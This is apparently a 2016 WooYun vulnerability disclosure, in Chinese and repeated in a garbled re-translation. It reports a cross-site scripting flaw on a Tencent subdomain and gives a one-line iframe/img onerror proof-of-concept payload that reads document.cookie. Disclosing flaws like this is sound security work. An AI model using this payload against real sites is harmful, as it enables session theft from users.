腾讯又一XSS被广泛用于黑产

漏洞标题 腾讯又一XSS被广泛用于黑产 相关厂商 腾讯 漏洞作者 %2e 提交时间 2016-05-05 12:43 公开时间 2016-06-20 22:20 漏洞类型 XSS 跨站脚本攻击 危害等…

漏洞标题 腾讯XSS广泛用于黑色生产 相关制造商 腾讯 漏洞作者 %2E 提交时间 2016-05-05 12: 43 公共时间 2016-06-20 22: 20 漏洞类型 XSS跨站点脚本攻击 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 XSS 漏洞详细信息 POC &lt; iframe src='http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)&gt;' &GT;&LT;/iframe中&GT;

漏洞证明: POC &lt; iframe src='http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)&gt;' &GT;&LT;/iframe中&GT;

修理计划: :) 没有 版权声明:请注明来源%2e @乌云